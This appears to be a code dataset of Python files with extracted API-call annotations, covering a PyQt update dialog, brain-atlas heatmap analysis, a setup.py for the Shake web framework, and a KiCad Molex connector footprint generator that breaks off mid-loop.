getattr(dialog, _exec_attr)()
def update_available(pysparkle, maxitem, items):
dialog = QMessageBox()
dialog.setIcon(QMessageBox.Icon.Information)
dialog.setWindowTitle(dialog.tr("A new version of {} is available!").format(pysparkle.appname))
dialog.setText(dialog.tr("{} {} is now available (you have {}).\n\nWould you like to download it now?")
.format(pysparkle.appname, maxitem['version'], pysparkle.appver))
if any(item['notes'] for item in items):
grid = dialog.layout()
label = QLabel(dialog.tr("Release notes:"))
grid.addWidget(label, grid.rowCount(), 0, 1, grid.columnCount())
notes = QTextEdit()
notes.setText("<br/>\n".join("<h3>{title}</h3>\n{notes}\n".format(**item) for item in items))
notes.setFixedHeight(200)
notes.setReadOnly(True)
grid.addWidget(notes, grid.rowCount(), 0, 1, grid.columnCount())
dialog.updateGeometry()
get_button = dialog.addButton(dialog.tr("Get update"), QMessageBox.ButtonRole.YesRole)
skip_button = dialog.addButton(dialog.tr("Skip this version"), QMessageBox.ButtonRole.NoRole)
later_button = dialog.addButton(dialog.tr("Remind me later"), QMessageBox.ButtonRole.RejectRole)
getattr(dialog, _exec_attr)()
result = dialog.clickedButton()
if result in (get_button, skip_button):
return result == get_button
| [
"PyQt4.QtGui.QMessageBox",
"PyQt4.QtGui.QTextEdit"
] | [((1275, 1288), 'PyQt4.QtGui.QMessageBox', 'QMessageBox', ([], {}), '()\n', (1286, 1288), False, 'from PyQt4.QtGui import QMessageBox, QLabel, QTextEdit\n'), ((1843, 1856), 'PyQt4.QtGui.QMessageBox', 'QMessageBox', ([], {}), '()\n', (1854, 1856), False, 'from PyQt4.QtGui import QMessageBox, QLabel, QTextEdit\n'), ((2327, 2340), 'PyQt4.QtGui.QMessageBox', 'QMessageBox', ([], {}), '()\n', (2338, 2340), False, 'from PyQt4.QtGui import QMessageBox, QLabel, QTextEdit\n'), ((2803, 2816), 'PyQt4.QtGui.QMessageBox', 'QMessageBox', ([], {}), '()\n', (2814, 2816), False, 'from PyQt4.QtGui import QMessageBox, QLabel, QTextEdit\n'), ((3230, 3243), 'PyQt4.QtGui.QMessageBox', 'QMessageBox', ([], {}), '()\n', (3241, 3243), False, 'from PyQt4.QtGui import QMessageBox, QLabel, QTextEdit\n'), ((3803, 3814), 'PyQt4.QtGui.QTextEdit', 'QTextEdit', ([], {}), '()\n', (3812, 3814), False, 'from PyQt4.QtGui import QMessageBox, QLabel, QTextEdit\n')] |
import numpy as np
import matplotlib.pyplot as plt
import pandas as pd
from matplotlib.colors import LinearSegmentedColormap
ms_color = [0.12156863, 0.46666667, 0.70588235, 1]
hc_color = [1., 0.49803922, 0.05490196, 1]
SMALL_SIZE = 12
MEDIUM_SIZE = 14
BIGGER_SIZE = 16
plt.rc('font', size=SMALL_SIZE) # controls default text sizes
plt.rc('axes', titlesize=BIGGER_SIZE) # fontsize of the axes title
plt.rc('axes', labelsize=MEDIUM_SIZE) # fontsize of the x and y labels
plt.rc('xtick', labelsize=SMALL_SIZE) # fontsize of the tick labels
plt.rc('ytick', labelsize=SMALL_SIZE) # fontsize of the tick labels
plt.rc('legend', fontsize=SMALL_SIZE) # legend fontsize
plt.rc('figure', titlesize=BIGGER_SIZE) # fontsize of the figure title
# set serif font
plt.rc('font', family='serif')
def generate_transparanet_cm(base='coolwarm', name="TransCoWa"):
# copy from existing colormap
ncolors = 256
color_array = plt.get_cmap(base)(range(ncolors))
# create parabolic decrease
decr = [-1*(x**2)+1 for x in range(int(ncolors/2))]
# normalize
decr = (decr - np.min(decr))/(np.max(decr - np.min(decr)))
# use inverted parabola as increase
incr = np.copy(decr)[::-1]
alphas = np.concatenate((decr, incr))
# update alpha values
color_array[:,-1] = alphas
# create new colormap and register it
transparent_coolwarm = LinearSegmentedColormap.from_list(name, color_array)
plt.register_cmap(cmap=transparent_coolwarm)
def get_labels_dict(path):
import xmltodict
with open(path) as f:
labels_xml = xmltodict.parse(f.read())['atlas']['data']['label']
labels_dict = {}
for row in labels_xml:
labels_dict[int(row['index'])] = row['name']
return labels_dict
def heatmap_per_region(hm, atlas, positive=True, size_normalize=False, signed=False):
# get heatmap mean per region
# use only positive values
signed_hm = np.copy(hm)
if signed:
if positive:
signed_hm[signed_hm<0] = 0
else:
signed_hm[signed_hm>0] = 0
regional_hm = {}
for lbl_idx in np.unique(atlas):
# skip outside area
if lbl_idx != 0:
atlas_lbl = atlas.copy()
# get region mask for each label
atlas_lbl[lbl_idx!=atlas] = 0
atlas_lbl[lbl_idx==atlas] = 1
# multiply region mask with heatmap
region_intensity = np.mean(atlas_lbl * np.squeeze(signed_hm))
if size_normalize:
region_size = np.sum(atlas_lbl).item()
region_intensity /= region_size
regional_hm[lbl_idx] = region_intensity
return regional_hm
def aggregate_regions(regional_hm, all_areas):
# aggregate atlas regions to previously defined areas
area_hm = {}
for name, (min_idx, max_idx) in all_areas.items():
regions_fit = []
for key in regional_hm.keys():
if key in range(min_idx, max_idx+1):
regions_fit.append(regional_hm[key])
region_mean = np.mean(regions_fit)
area_hm[name] = region_mean
return area_hm
def get_area_relevance(heatmaps, atlas, area_dict, positive=True, size_normalize=True):
keys = []
values = []
for hm in heatmaps:
regional_hm = heatmap_per_region(hm, atlas, positive=positive, size_normalize=size_normalize)
area_hm = aggregate_regions(regional_hm, area_dict)
# sort by values
area_hm_sorted = sorted(area_hm.items(), key=lambda kv: kv[1])
keys_sorted = [row[0] for row in area_hm_sorted]
values_sorted = [row[1] for row in area_hm_sorted]
keys.append(keys_sorted)
values.append(values_sorted)
return keys, values
def translate_keys(keys):
names_list = []
for key_list in keys:
name_list = []
for key in key_list:
name_list.append(short_name_map[key])
names_list.append(name_list)
return names_list
def wrap_as_df(keys, values):
df_ms = pd.DataFrame({"values_ms": values[0]}, keys[0])
df_hc = pd.DataFrame({"values_hc": values[1]}, keys[1])
df = pd.merge(df_ms, df_hc, left_index=True, right_index=True, how='outer')
return df
def reduce_df(df, take=30):
# get order based on relevance sum
abs_order = (np.abs(df["values_hc"]) + np.abs(df["values_ms"])).sort_values().index
most = abs_order[-take:]
short_df = df.loc[most]
order = (short_df["values_hc"] + short_df["values_ms"]).sort_values().index
short_df = df.loc[order]
return short_df
def reduce_two_dfs(df_zero, df_one, take=30):
abs_order = (df_zero.abs().sum() + df_one.abs().sum()).sort_values().index
most = abs_order[-take:]
# columns are keys so use [:, key]
short_df_zero = df_zero.loc[:,most]
short_df_one = df_one.loc[:,most]
order = (short_df_zero.sum() + short_df_one.sum()).sort_values().index
short_df_zero = short_df_zero.reindex(order, axis=1)
short_df_one = short_df_one.reindex(order, axis=1)
return short_df_zero, short_df_one
def plot_key_value_pairs(keys, values, title, loc="center left"):
plt.figure(figsize=(10, 6))
plt.plot(keys[0], values[0], 'o', color=ms_color, label="CDMS")
plt.plot(keys[1], values[1], 'o', color=hc_color, label="HC")
plt.xticks(rotation='vertical')
plt.legend(loc=loc)
plt.title(title)
plt.show()
def plot_dataframe(df, title, loc="center left"):
plt.figure(figsize=(10, 6))
plt.plot(df["values_ms"], 'o', color=ms_color, label="CDMS")
plt.plot(df["values_hc"], 'o', color=hc_color, label="HC")
plt.xticks(rotation='vertical')
plt.legend(loc=loc)
plt.title(title)
plt.show()
# Modified areas from Visualizing evidence for AD paper by
# Boehle et al. Based on Neuromorphometrics atlas from SPM12
# Name: (min, max)
gm_areas= {
"Accumbens": (23, 30),
"Amygdala": (31, 32),
"Brain Stem": (35, 35),
"Caudate": (36, 37),
"Cerebellum": (38, 41),
"Hippocampus": (47, 48),
"Parahippocampal gyrus": (170, 171),
"Pallidum": (55, 56),
"Putamen": (57, 58),
"Thalamus": (59, 60),
"CWM": (44, 45),
"ACG": (100, 101),
"Ant. Insula": (102, 103),
"Post. Insula": (172, 173),
"AOG": (104, 105),
"AG": (106, 107),
"Cuneus": (114, 115),
"Central operculum": (112, 113),
"Frontal operculum": (118, 119),
"Frontal pole": (120, 121),
"Fusiform gyrus": (122, 123),
"Temporal pole": (202, 203),
"TrIFG": (204, 205),
"TTG": (206, 207),
"Entorh. cortex": (116, 117),
"Parietal operculum": (174, 175),
"SPL": (198, 199),
"CSF": (46, 46),
"3rd Ventricle": (4, 4),
"4th Ventricle": (11, 11),
"Lateral Ventricles": (49, 52),
"Diencephalon": (61, 62),
"Vessels": (63, 64),
"Optic Chiasm": (69, 69),
"Vermal Lobules": (71, 73),
"Basal Forebrain": (75, 76),
"Calc": (108, 109),
"GRe": (124, 125),
"IOG": (128, 129),
"ITG": (132, 133),
"LiG": (134, 135),
"LOrG": (136, 137),
"MCgG": (138, 139),
"MFC": (140, 141),
"MFG": (142, 143),
"MOG": (144, 145),
"MOrG": (146, 147),
"MPoG": (148, 149),
"MPrG": (150, 151),
"MSFG": (152, 153),
"MTG": (154, 155),
"OCP": (156, 157),
"OFuG": (160, 161),
"OpIFG": (162, 163),
"OrIFG": (164, 165),
"PCgG": (166, 167),
"PCu": (168, 169),
"PoG": (176, 177),
"POrG": (178, 179),
"PP": (180, 181),
"PrG": (182, 183),
"PT": (184, 185),
"SCA": (186, 187),
"SFG": (190, 191),
"SMC": (192, 193),
"SMG": (194, 195),
"SOG": (196, 197),
"STG": (200, 201),
}
short_name_map = {
'Accumbens': 'Accumbens',
'Amygdala': 'Amygdala',
'Brain Stem': 'Brain Stem',
'Caudate': 'Caudate',
'Cerebellum': 'Cerebellum',
'Hippocampus': 'Hippocampus',
'Parahippocampal gyrus': 'Parahippocampal gyr.',
'Pallidum': 'Pallidum',
'Putamen': 'Putamen',
'Thalamus': 'Thalamus',
'Diencephalon': 'Diencephalon',
'CWM': 'Cerebral white matter',
'ACG': 'Ant. cingulate gyr.',
'Ant. Insula': 'Ant. insula',
'Post. Insula': 'Post. insula',
'AOG': 'Ant. orbital gyr.',
'AG': 'Angular gyr.',
'Cuneus': 'Cuneus',
'Central operculum': 'Central operculum',
'Frontal operculum': 'Frontal operculum',
'Frontal pole': 'Frontal pole',
'Fusiform gyrus': 'Fusiform gyr.',
'Temporal pole': 'Temporal pole',
'TrIFG': 'Triangular part of IFG',
'TTG': 'Trans. temporal gyr.',
'Entorh. cortex': 'Entorhinal area',
'Parietal operculum': 'Parietal operculum',
'SPL': 'Sup. parietal lobule',
'CSF': 'CSF',
'3rd Ventricle': '3rd Ventricle',
'4th Ventricle': '4th Ventricle',
'Lateral Ventricles': 'Inf. Lat. Ventricles',
'Vessels': 'Vessels',
'Optic Chiasm': 'Optic Chiasm',
'Vermal Lobules': 'Cereb. Verm. Lob.',
'Basal Forebrain': 'Basal Forebrain',
'Calc': 'Calcarine cortex',
'GRe': 'Gyrus rectus',
'IOG': 'Inf. occipital gyr.',
'ITG': 'Inf. temporal gyr.',
'LiG': 'Lingual gyr.',
'LOrG': 'Lat. orbital gyr.',
'MCgG': 'Mid. cingulate gyr.',
'MFC': 'Med. frontal cortex',
'MFG': 'Mid. frontal gyr.',
'MOG': 'Mid. occipital gyr.',
'MOrG': 'Med. orbital gyr.',
'MPoG': 'Post. gyr. med. seg.',
'MPrG': 'Pre. gyr. med. seg.',
'MSFG': 'Sup. frontal gyr. med. seg.',
'MTG': 'Mid. temporal gyr.',
'OCP': 'Occipital pole',
'OFuG': 'Occipital fusiform gyr.',
'OpIFG': 'Opercular part of IFG',
'OrIFG': 'Orbital part of IFG',
'PCgG': 'Post. cingulate gyr.',
'PCu': 'Precuneus',
'PoG': 'Postcentral gyr.',
'POrG': 'Post. orbital gyr.',
'PP': 'Planum polare',
'PrG': 'Precentral gyr.',
'PT': 'Planum temporale',
'SCA': 'Subcallosal area',
'SFG': 'Sup. frontal gyr.',
'SMC': 'Supp. motor cortex',
'SMG': 'Supramarginal gyr.',
'SOG': 'Sup. occipital gyr.',
'STG': 'Sup. temporal gyr.'
}
# Aggregated white matter areas from JHU ICBM DTI atlas from FSL
# Name: (min, max)
wm_areas= {
"Middle cerebellar peduncle": (1, 2),
"Corpus callosum": (3, 5),
"Fornix": (6, 6),
"Corticospinal tract": (7, 8),
"Medial lemniscus": (9, 10),
"Inferior cerebellar peduncle": (11, 12),
"Superior cerebellar peduncle": (13, 14),
"Cerebral peduncle": (15, 16),
"Anterior limb of internal capsule": (17, 18),
"Posterior limb of internal capsule": (19, 20),
"Retrolenticular part of internal capsule": (21, 22),
"Anterior corona radiata": (23, 24),
"Superior corona radiata": (25, 26),
"Posterior corona radiata": (27, 28),
"Posterior thalamic radiation": (29, 30),
"Sagittal stratum": (31, 32),
"External capsule": (33, 34),
"Cingulum": (35, 38),
"Superior longitudinal fasciculus": (41, 42),
"Superior fronto-occipital fasciculus": (43, 44),
"Uncinate fasciculus": (45, 46),
"Tapetum": (47, 48),
}
| [
"numpy.mean",
"matplotlib.pyplot.plot",
"numpy.concatenate",
"numpy.min",
"pandas.DataFrame",
"numpy.abs",
"matplotlib.pyplot.xticks",
"pandas.merge",
"numpy.squeeze",
"matplotlib.pyplot.register_cmap",
"matplotlib.pyplot.title",
"matplotlib.colors.LinearSegmentedColormap.from_list",
"matplo... | [((272, 303), 'matplotlib.pyplot.rc', 'plt.rc', (['"""font"""'], {'size': 'SMALL_SIZE'}), "('font', size=SMALL_SIZE)\n", (278, 303), True, 'import matplotlib.pyplot as plt\n'), ((343, 380), 'matplotlib.pyplot.rc', 'plt.rc', (['"""axes"""'], {'titlesize': 'BIGGER_SIZE'}), "('axes', titlesize=BIGGER_SIZE)\n", (349, 380), True, 'import matplotlib.pyplot as plt\n'), ((414, 451), 'matplotlib.pyplot.rc', 'plt.rc', (['"""axes"""'], {'labelsize': 'MEDIUM_SIZE'}), "('axes', labelsize=MEDIUM_SIZE)\n", (420, 451), True, 'import matplotlib.pyplot as plt\n'), ((488, 525), 'matplotlib.pyplot.rc', 'plt.rc', (['"""xtick"""'], {'labelsize': 'SMALL_SIZE'}), "('xtick', labelsize=SMALL_SIZE)\n", (494, 525), True, 'import matplotlib.pyplot as plt\n'), ((559, 596), 'matplotlib.pyplot.rc', 'plt.rc', (['"""ytick"""'], {'labelsize': 'SMALL_SIZE'}), "('ytick', labelsize=SMALL_SIZE)\n", (565, 596), True, 'import matplotlib.pyplot as plt\n'), ((630, 667), 'matplotlib.pyplot.rc', 'plt.rc', (['"""legend"""'], {'fontsize': 'SMALL_SIZE'}), "('legend', fontsize=SMALL_SIZE)\n", (636, 667), True, 'import matplotlib.pyplot as plt\n'), ((689, 728), 'matplotlib.pyplot.rc', 'plt.rc', (['"""figure"""'], {'titlesize': 'BIGGER_SIZE'}), "('figure', titlesize=BIGGER_SIZE)\n", (695, 728), True, 'import matplotlib.pyplot as plt\n'), ((779, 809), 'matplotlib.pyplot.rc', 'plt.rc', (['"""font"""'], {'family': '"""serif"""'}), "('font', family='serif')\n", (785, 809), True, 'import matplotlib.pyplot as plt\n'), ((1235, 1263), 'numpy.concatenate', 'np.concatenate', (['(decr, incr)'], {}), '((decr, incr))\n', (1249, 1263), True, 'import numpy as np\n'), ((1391, 1443), 'matplotlib.colors.LinearSegmentedColormap.from_list', 'LinearSegmentedColormap.from_list', (['name', 'color_array'], {}), '(name, color_array)\n', (1424, 1443), False, 'from matplotlib.colors import LinearSegmentedColormap\n'), ((1448, 1492), 'matplotlib.pyplot.register_cmap', 'plt.register_cmap', ([], {'cmap': 'transparent_coolwarm'}), '(cmap=transparent_coolwarm)\n', (1465, 1492), True, 'import matplotlib.pyplot as plt\n'), ((1934, 1945), 'numpy.copy', 'np.copy', (['hm'], {}), '(hm)\n', (1941, 1945), True, 'import numpy as np\n'), ((2123, 2139), 'numpy.unique', 'np.unique', (['atlas'], {}), '(atlas)\n', (2132, 2139), True, 'import numpy as np\n'), ((4030, 4077), 'pandas.DataFrame', 'pd.DataFrame', (["{'values_ms': values[0]}", 'keys[0]'], {}), "({'values_ms': values[0]}, keys[0])\n", (4042, 4077), True, 'import pandas as pd\n'), ((4090, 4137), 'pandas.DataFrame', 'pd.DataFrame', (["{'values_hc': values[1]}", 'keys[1]'], {}), "({'values_hc': values[1]}, keys[1])\n", (4102, 4137), True, 'import pandas as pd\n'), ((4148, 4218), 'pandas.merge', 'pd.merge', (['df_ms', 'df_hc'], {'left_index': '(True)', 'right_index': '(True)', 'how': '"""outer"""'}), "(df_ms, df_hc, left_index=True, right_index=True, how='outer')\n", (4156, 4218), True, 'import pandas as pd\n'), ((5155, 5182), 'matplotlib.pyplot.figure', 'plt.figure', ([], {'figsize': '(10, 6)'}), '(figsize=(10, 6))\n', (5165, 5182), True, 'import matplotlib.pyplot as plt\n'), ((5187, 5250), 'matplotlib.pyplot.plot', 'plt.plot', (['keys[0]', 'values[0]', '"""o"""'], {'color': 'ms_color', 'label': '"""CDMS"""'}), "(keys[0], values[0], 'o', color=ms_color, label='CDMS')\n", (5195, 5250), True, 'import matplotlib.pyplot as plt\n'), ((5255, 5316), 'matplotlib.pyplot.plot', 'plt.plot', (['keys[1]', 'values[1]', '"""o"""'], {'color': 'hc_color', 'label': '"""HC"""'}), "(keys[1], values[1], 'o', color=hc_color, label='HC')\n", (5263, 5316), True, 'import matplotlib.pyplot as plt\n'), ((5321, 5352), 'matplotlib.pyplot.xticks', 'plt.xticks', ([], {'rotation': '"""vertical"""'}), "(rotation='vertical')\n", (5331, 5352), True, 'import matplotlib.pyplot as plt\n'), ((5357, 5376), 'matplotlib.pyplot.legend', 'plt.legend', ([], {'loc': 'loc'}), '(loc=loc)\n', (5367, 5376), True, 'import matplotlib.pyplot as plt\n'), ((5381, 5397), 'matplotlib.pyplot.title', 'plt.title', (['title'], {}), '(title)\n', (5390, 5397), True, 'import matplotlib.pyplot as plt\n'), ((5402, 5412), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (5410, 5412), True, 'import matplotlib.pyplot as plt\n'), ((5468, 5495), 'matplotlib.pyplot.figure', 'plt.figure', ([], {'figsize': '(10, 6)'}), '(figsize=(10, 6))\n', (5478, 5495), True, 'import matplotlib.pyplot as plt\n'), ((5500, 5560), 'matplotlib.pyplot.plot', 'plt.plot', (["df['values_ms']", '"""o"""'], {'color': 'ms_color', 'label': '"""CDMS"""'}), "(df['values_ms'], 'o', color=ms_color, label='CDMS')\n", (5508, 5560), True, 'import matplotlib.pyplot as plt\n'), ((5565, 5623), 'matplotlib.pyplot.plot', 'plt.plot', (["df['values_hc']", '"""o"""'], {'color': 'hc_color', 'label': '"""HC"""'}), "(df['values_hc'], 'o', color=hc_color, label='HC')\n", (5573, 5623), True, 'import matplotlib.pyplot as plt\n'), ((5628, 5659), 'matplotlib.pyplot.xticks', 'plt.xticks', ([], {'rotation': '"""vertical"""'}), "(rotation='vertical')\n", (5638, 5659), True, 'import matplotlib.pyplot as plt\n'), ((5664, 5683), 'matplotlib.pyplot.legend', 'plt.legend', ([], {'loc': 'loc'}), '(loc=loc)\n', (5674, 5683), True, 'import matplotlib.pyplot as plt\n'), ((5688, 5704), 'matplotlib.pyplot.title', 'plt.title', (['title'], {}), '(title)\n', (5697, 5704), True, 'import matplotlib.pyplot as plt\n'), ((5709, 5719), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (5717, 5719), True, 'import matplotlib.pyplot as plt\n'), ((946, 964), 'matplotlib.pyplot.get_cmap', 'plt.get_cmap', (['base'], {}), '(base)\n', (958, 964), True, 'import matplotlib.pyplot as plt\n'), ((1202, 1215), 'numpy.copy', 'np.copy', (['decr'], {}), '(decr)\n', (1209, 1215), True, 'import numpy as np\n'), ((3057, 3077), 'numpy.mean', 'np.mean', (['regions_fit'], {}), '(regions_fit)\n', (3064, 3077), True, 'import numpy as np\n'), ((1106, 1118), 'numpy.min', 'np.min', (['decr'], {}), '(decr)\n', (1112, 1118), True, 'import numpy as np\n'), ((1135, 1147), 'numpy.min', 'np.min', (['decr'], {}), '(decr)\n', (1141, 1147), True, 'import numpy as np\n'), ((2459, 2480), 'numpy.squeeze', 'np.squeeze', (['signed_hm'], {}), '(signed_hm)\n', (2469, 2480), True, 'import numpy as np\n'), ((4318, 4341), 'numpy.abs', 'np.abs', (["df['values_hc']"], {}), "(df['values_hc'])\n", (4324, 4341), True, 'import numpy as np\n'), ((4344, 4367), 'numpy.abs', 'np.abs', (["df['values_ms']"], {}), "(df['values_ms'])\n", (4350, 4367), True, 'import numpy as np\n'), ((2543, 2560), 'numpy.sum', 'np.sum', (['atlas_lbl'], {}), '(atlas_lbl)\n', (2549, 2560), True, 'import numpy as np\n')] |
# coding=utf-8
import io
import os
import re
from setuptools import setup, find_packages
def get_path(*args):
return os.path.join(os.path.dirname(__file__), *args)
def read_from(filepath):
with io.open(filepath, 'rt', encoding='utf8') as f:
return f.read()
def get_requirements(filename='requirements.txt'):
data = read_from(get_path(filename))
lines = map(lambda s: s.strip(), data.splitlines())
return [l for l in lines if l and not l.startswith('#')]
data = read_from(get_path('shake', '__init__.py')).encode('utf8')
version = str(re.search(b"__version__\s*=\s*u?'([^']+)'", data).group(1)).strip()
desc = str(re.search(b'"""(.+)"""', data, re.DOTALL).group(1)).strip()
setup(
name='Shake',
version=version,
author='<NAME>',
author_email='<EMAIL>',
packages=find_packages(),
include_package_data=True,
zip_safe=False,
url='http://github.com/lucuma/shake',
license='MIT license (see LICENSE)',
description='A lightweight web framework based on Werkzeug and Jinja2 as an alternative to Flask',
long_description=desc,
install_requires=get_requirements(),
classifiers=[
'Development Status :: 4 - Beta',
'Environment :: Web Environment',
'Intended Audience :: Developers',
'License :: OSI Approved :: MIT License',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.6',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: Implementation :: PyPy',
]
)
| [
"os.path.dirname",
"setuptools.find_packages",
"io.open",
"re.search"
] | [((136, 161), 'os.path.dirname', 'os.path.dirname', (['__file__'], {}), '(__file__)\n', (151, 161), False, 'import os\n'), ((206, 246), 'io.open', 'io.open', (['filepath', '"""rt"""'], {'encoding': '"""utf8"""'}), "(filepath, 'rt', encoding='utf8')\n", (213, 246), False, 'import io\n'), ((819, 834), 'setuptools.find_packages', 'find_packages', ([], {}), '()\n', (832, 834), False, 'from setuptools import setup, find_packages\n'), ((570, 621), 're.search', 're.search', (['b"__version__\\\\s*=\\\\s*u?\'([^\']+)\'"', 'data'], {}), '(b"__version__\\\\s*=\\\\s*u?\'([^\']+)\'", data)\n', (579, 621), False, 'import re\n'), ((649, 690), 're.search', 're.search', (['b\'"""(.+)"""\'', 'data', 're.DOTALL'], {}), '(b\'"""(.+)"""\', data, re.DOTALL)\n', (658, 690), False, 'import re\n')] |
#!/usr/bin/env python3
'''
kicad-footprint-generator is free software: you can redistribute it and/or
modify it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
kicad-footprint-generator is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with kicad-footprint-generator. If not, see < http://www.gnu.org/licenses/ >.
'''
import sys
import os
#sys.path.append(os.path.join(sys.path[0],"..","..","kicad_mod")) # load kicad_mod path
# export PYTHONPATH="${PYTHONPATH}<path to kicad-footprint-generator directory>"
sys.path.append(os.path.join(sys.path[0], "..", "..", "..")) # load parent path of KicadModTree
from math import sqrt
import argparse
import yaml
from helpers import *
from KicadModTree import *
sys.path.append(os.path.join(sys.path[0], "..", "..", "tools")) # load parent path of tools
from footprint_text_fields import addTextFields
series = "Mini-Fit_Sr"
series_long = 'Mini-Fit Sr. Power Connectors'
manufacturer = 'Molex'
orientation = 'V'
number_of_rows = 2
datasheet = 'http://www.molex.com/pdm_docs/sd/439151404_sd.pdf'
#pins_per_row per row
pins_per_row_range = [3, 4, 5, 6, 7]
#Molex part number
#n = number of circuits per row
part_code = "43915-xx{n:02}"
pitch = 10
drill = 2.8
offset_second_pad = 4.4
pitch_row = offset_second_pad + 8.06
pad_to_pad_clearance = 3
max_annular_ring = 1
min_annular_ring = 0.15
#locating pins
x_loc = 8.43
r_loc = 3.0
pad_size = [offset_second_pad + 0.1, pitch - pad_to_pad_clearance]
if pad_size[1] - drill < 2*min_annular_ring:
pad_size[1] = drill + 2*min_annular_ring
if pad_size[1] - drill > 2*max_annular_ring:
pad_size[1] = drill + 2*max_annular_ring
version_params = {
'with_thermals':{
'description': ', With thermal vias in pads',
'fp_name_suffix': '_ThermalVias',
'thermals': True
},
'only_pads':{
'description': '',
'fp_name_suffix': '',
'thermals': False
}
}
def generate_one_footprint(pins, params, configuration):
pad_silk_off = configuration['silk_pad_clearance'] + configuration['silk_line_width']/2
mpn = part_code.format(n=pins*number_of_rows)
# handle arguments
orientation_str = configuration['orientation_options'][orientation]
footprint_name = configuration['fp_name_format_string'].format(man=manufacturer,
series=series,
mpn=mpn, num_rows=number_of_rows, pins_per_row=pins_per_row, mounting_pad = "",
pitch=pitch, orientation=orientation_str)
footprint_name += params['fp_name_suffix']
kicad_mod = Footprint(footprint_name)
desc_format_str = "Molex {:s}, {:s}{:s}, {:d} Pins per row ({:s}), generated with kicad-footprint-generator"
kicad_mod.setDescription(desc_format_str.format(series_long, mpn, params['description'], pins, datasheet))
kicad_mod.setTags(configuration['keyword_fp_string'].format(series=series,
orientation=orientation_str, man=manufacturer,
entry=configuration['entry_direction'][orientation]))
#calculate fp dimensions
#ref: http://www.molex.com/pdm_docs/sd/439151404_sd.pdf
#A = distance between mounting holes
A = pins * pitch + 1.41
#B = distance between end pin centers
B = (pins - 1) * pitch
#E = length of part
E = pins * pitch + 0.9
#connector width
W = 19.16
#corner positions
y1 = -(E-B)/2
y2 = y1 + E
x1 = -1.15
x2 = x1 + W
TL = 5
TW = 13
body_edge={
'left':x1,
'right':x2,
'bottom':y2,
'top': y1
}
bounding_box = {
'left': -pad_size[0]/2,
'right': pitch_row + offset_second_pad + pad_size[0]/2
}
pad_silk_off = configuration['silk_pad_clearance'] + configuration['silk_line_width']/2
#generate the pads
for row_idx in range(2):
for pad_idx in range(2):
kicad_mod.append(PadArray(
pincount=pins, start=[row_idx*pitch_row + pad_idx*offset_second_pad, 0],
initial=row_idx*pins+1, y_spacing=pitch, size=pad_size, drill=drill,
type=Pad.TYPE_THT, shape=Pad.SHAPE_RECT, layers=Pad.LAYERS_THT,
tht_pad1_shape=Pad.SHAPE_RECT))
#thermal vias
d_small = 0.3
s_small = d_small + 2*min_annular_ring
thermal_to_pad_edge = s_small/2 + 0.15
if params['thermals']:
for yi in range(pins):
for xi in range(number_of_rows):
n = xi*pins + yi + 1
pad_center_x = xi*pitch_row + offset_second_pad/2
pad_center_y = yi*pitch
pad_l = offset_second_pad + pad_size[0]
dy = (pad_size[1] - 2*thermal_to_pad_edge)/2
dx = (pad_l - 2*thermal_to_pad_edge)/4
#draw rectangle on F.Fab layer
# kicad_mod.append(RectLine(
# start=[pad_center_x - pad_l/2, pad_center_y - pad_size[1]/2],
# end=[pad_center_x + pad_l/2, pad_center_y + pad_size[1]/2],
# layer='F.Fab', width=configuration['fab_line_width']))
kicad_mod.append(PadArray(center=[pad_center_x, pad_center_y],
pincount=3, x_spacing=dx*2,
drill=d_small, size=s_small, initial=n, increment=0,
shape=Pad.SHAPE_CIRCLE, type=Pad.TYPE_THT, layers=Pad.LAYERS_THT))
kicad_mod.append(PadArray(center=[pad_center_x, pad_center_y - dy],
pincount=5, x_spacing=dx,
drill=d_small, size=s_small, initial=n, increment=0,
type=Pad.TYPE_THT, shape=Pad.SHAPE_CIRCLE, layers=Pad.LAYERS_THT))
kicad_mod.append(PadArray(center=[pad_center_x, pad_center_y + dy],
pincount=5, x_spacing=dx,
drill=d_small, size=s_small, initial=n, increment=0,
type=Pad.TYPE_THT, shape=Pad.SHAPE_CIRCLE, layers=Pad.LAYERS_THT))
# locating pins
kicad_mod.append(Pad(at=[x_loc, 5], type=Pad.TYPE_NPTH, shape=Pad.SHAPE_CIRCLE,
size=r_loc, drill=r_loc, layers=Pad.LAYERS_NPTH))
kicad_mod.append(Pad(at=[x_loc, B/2-A/2], type=Pad.TYPE_THT, shape=Pad.SHAPE_CIRCLE,
size=r_loc+0.5, drill=r_loc, layers=Pad.LAYERS_THT))
kicad_mod.append(Pad(at=[x_loc, B/2+A/2], type=Pad.TYPE_THT, shape=Pad.SHAPE_CIRCLE,
size=r_loc+0.5, drill=r_loc, layers=Pad.LAYERS_THT))
#mark pin-1 (bottom layer)
kicad_mod.append(RectLine(start=[-pad_size[0]/2, -pad_size[1]/2],
end=[offset_second_pad + pad_size[0]/2,pad_size[1]/2],offset=pad_silk_off,
width=configuration['silk_line_width'], layer='B.SilkS'))
#draw connector outline (basic)
kicad_mod.append(RectLine(start=[x1,y1],end=[x2,y2],
width=configuration['fab_line_width'], layer='F.Fab'))
#connector outline on F.SilkScreen
off = configuration['silk_line_width']
corner = [
{'y': -pad_size[1]/2 - pad_silk_off, 'x': x1-off},
{'y': y1 - off, 'x': x1-off},
{'y': y1 - off, 'x': x_loc-r_loc/2-0.5},
]
# kicad_mod.append(PolygoneLine(polygone=corner,
# width=configuration['silk_line_width'], layer='F.SilkS'))
kicad_mod.append(Line(start=[x_loc-r_loc/2-0.5, y1 - off],
end=[x_loc-TW/2-off, y1 - off],
width=configuration['silk_line_width'], layer='F.SilkS'))
kicad_mod.append(PolygoneLine(polygone=corner,y_mirror=B/2,
width=configuration['silk_line_width'], layer='F.SilkS'))
kicad_mod.append(PolygoneLine(polygone=corner,x_mirror=x_loc,
width=configuration['silk_line_width'], layer='F.SilkS'))
kicad_mod.append(PolygoneLine(polygone=corner,y_mirror=B/2,x_mirror=x_loc,
width=configuration['silk_line_width'], layer='F.SilkS'))
#silk-screen between each pad
for i in range(pins-1):
ya = i * pitch + pad_size[1]/2 + pad_silk_off
